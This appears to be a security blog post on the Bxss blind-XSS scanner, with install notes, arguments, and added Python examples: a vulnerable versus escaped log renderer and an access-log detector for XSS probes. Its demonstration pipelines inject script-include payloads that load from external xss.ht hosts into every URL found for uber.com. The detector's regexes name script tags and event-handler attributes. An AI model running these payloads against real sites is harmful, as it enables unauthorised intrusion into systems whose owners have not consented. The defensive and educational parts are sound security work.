Offensive Security Tool: Bxss – Blind XSS Scanner

Mar 14, 2025 | Tools

Bxss – Blind XSS Scanner

Bxss – Blind XSS Scanner, developed by ethicalhackingplayground, is a tool designed to detect blind Cross-Site Scripting (XSS) vulnerabilities in web applications by injecting custom payloads into request headers and parameters. Unlike reflected XSS, where the payload fires immediately in the tester's own browser, blind XSS fires later and out of sight: the injected payload is stored and executed asynchronously in another context, such as an admin panel, a logging or monitoring system, or a third-party integration that renders the stored value. Because the tester never observes the execution directly, the payload has to call back to a listener the tester controls (the xss.ht hosts in the examples below) to confirm that it ran.
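The sink that makes blind XSS possible is a page that later renders stored request data, such as a log viewer in an admin panel. The following Python is an added example, not code from the original post or from the bxss project: it shows a minimal log-row renderer in its vulnerable form beside its hardened form. The LogEntry type, the callback.example host and the sample User-Agent are constructed for illustration.

```python
import html
from dataclasses import dataclass


@dataclass
class LogEntry:
    """One stored request, as an admin-panel log viewer might keep it (constructed type)."""
    ip: str
    user_agent: str
    path: str


# Constructed sample: the User-Agent carries a blind-XSS probe of the kind bxss injects.
# callback.example stands in for a tester-controlled listener host.
SAMPLE = LogEntry(
    ip="203.0.113.10",
    user_agent='"><script src=https://callback.example></script>',
    path="/login",
)


def render_row_unsafe(entry: LogEntry) -> str:
    """Vulnerable sink: untrusted header values are interpolated straight into HTML.

    Whoever opens the log page executes the stored script, which is exactly
    what a blind XSS payload waits for.
    """
    return f"<tr><td>{entry.ip}</td><td>{entry.user_agent}</td><td>{entry.path}</td></tr>"


def render_row_safe(entry: LogEntry) -> str:
    """Hardened sink: every untrusted field is HTML-escaped before it reaches the page.

    quote=True also escapes " and ', so a value cannot break out of an attribute either.
    """
    cells = (entry.ip, entry.user_agent, entry.path)
    return "<tr>" + "".join(f"<td>{html.escape(c, quote=True)}</td>" for c in cells) + "</tr>"


if __name__ == "__main__":
    print("unsafe:", render_row_unsafe(SAMPLE))
    print("safe:  ", render_row_safe(SAMPLE))
```

Output encoding at the sink is the fix; a Content-Security-Policy that does not allow script from arbitrary origins limits the damage if one sink is missed, because the stored `<script src=...>` cannot load.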

Features

  • Inject Blind XSS payloads into custom headers
  • Inject Blind XSS payloads into parameters
  • Uses different request methods (PUT, POST, GET, OPTIONS) all at once
  • Tool chaining
  • Really fast
  • Easy to set up

Install

go install -v github.com/ethicalhackingplayground/bxss/v2/cmd/bxss@latest

Arguments

Argument             Description                                  Default
-appendMode          Append the payload to the parameter
-concurrency int     Set the concurrency                          30
-header string       Set the custom header                        "User-Agent"
-headerFile string   Path to file containing headers to test
-parameters          Test the parameters for blind XSS
-payload string      The blind XSS payload
-payloadFile string  Path to file containing payloads to test

Demonstration

Blind XSS In Parameters

The pipeline enumerates subdomains with subfinder, pulls known URLs for them from gau, keeps only URLs whose query string contains an ampersand, and has bxss append the payload to every parameter value:

subfinder -d uber.com | gau | grep "&" | bxss -appendMode -payload '"><script src=https://hacker.xss.ht></script>' -parameters

Blind XSS In X-Forwarded-For Header

Here the payload is sent in the X-Forwarded-For header instead of the parameters, with bxss trying each of its request methods against every URL. A vulnerable target only reveals itself later, when the stored header value is rendered somewhere and the script calls back to the xss.ht host:

subfinder -d uber.com | gau | bxss -payload '"><script src=https://z0id.xss.ht></script>' -header "X-Forwarded-For"
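Defenders see these probes in their own access logs long before any callback fires: the two pipelines above put the payload into query parameters and into request headers, using several HTTP methods. The following Python is an added example, not code from the original post or from the bxss project. It parses constructed combined-format log lines (extended with a trailing X-Forwarded-For field) and flags remote script includes, inline script tags and event-handler attributes in the surfaces bxss targets, after undoing log escaping and repeated URL encoding. The log format, the sample lines and the callback.example host are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Assumed log format: combined log format plus a trailing quoted X-Forwarded-For field.
# Double quotes inside a quoted field are assumed to be logged as \" (one common convention).
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)" "(?P<xff>(?:[^"\\]|\\.)*)"$'
)

# Indicators are checked in order; the first match labels the finding.
INDICATORS = (
    ("remote script include", re.compile(r"<script\b[^>]*\bsrc\s*=", re.I)),
    ("inline script tag", re.compile(r"<script\b", re.I)),
    ("event handler attribute", re.compile(r"<[^>]*\bon[a-z]+\s*=", re.I)),
)

# Constructed sample lines. callback.example stands in for a tester-controlled listener.
SAMPLE_LOG = [
    '198.51.100.7 - - [14/Mar/2025:10:00:01 +0000] "GET /search?q=shoes&page=2 HTTP/1.1" 200 512 "-" "Mozilla/5.0" "-"',
    '198.51.100.7 - - [14/Mar/2025:10:00:02 +0000] "GET /search?q=shoes%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fcallback.example%3E%3C%2Fscript%3E&page=2 HTTP/1.1" 200 512 "-" "Mozilla/5.0" "-"',
    '198.51.100.7 - - [14/Mar/2025:10:00:03 +0000] "PUT /api/item HTTP/1.1" 405 0 "-" "\\"><script src=https://callback.example></script>" "-"',
    '198.51.100.7 - - [14/Mar/2025:10:00:04 +0000] "OPTIONS /api/item HTTP/1.1" 204 0 "-" "Mozilla/5.0" "\\"><img src=x onerror=probe()>"',
]


def decode(value: str) -> str:
    """Undo the log escaping and the repeated URL encoding a probe may hide behind."""
    value = value.replace('\\"', '"')
    for _ in range(3):  # bounded, so a pathological value cannot loop forever
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_line(line: str) -> list[dict]:
    """Return one finding per surface (header or query parameter) that carries an indicator."""
    m = LINE_RE.match(line)
    if not m:
        return []  # unparsable line: skip it rather than abort the whole scan
    # Surfaces bxss exercises: custom headers and query parameters, whatever the method.
    surfaces = {
        "header:User-Agent": m["ua"],
        "header:X-Forwarded-For": m["xff"],
        "header:Referer": m["referer"],
    }
    for name, value in parse_qsl(urlsplit(m["target"]).query, keep_blank_values=True):
        surfaces[f"param:{name}"] = value
    findings = []
    for surface, raw in surfaces.items():
        value = decode(raw)
        for label, pattern in INDICATORS:
            if pattern.search(value):
                findings.append({"ip": m["ip"], "method": m["method"], "surface": surface, "indicator": label})
                break
    return findings


def scan_log(lines) -> list[dict]:
    """Scan an iterable of log lines and collect every finding."""
    return [finding for line in lines for finding in scan_line(line)]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['method']:<7} {f['surface']:<24} {f['indicator']}")
```

Because bxss rotates through PUT, POST, GET and OPTIONS, a useful triage signal is the same payload arriving across several methods from one source within seconds; the method is kept in each finding so that grouping can be done downstream.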

Clone the repo from GitHub: https://github.com/ethicalhackingplayground/bxss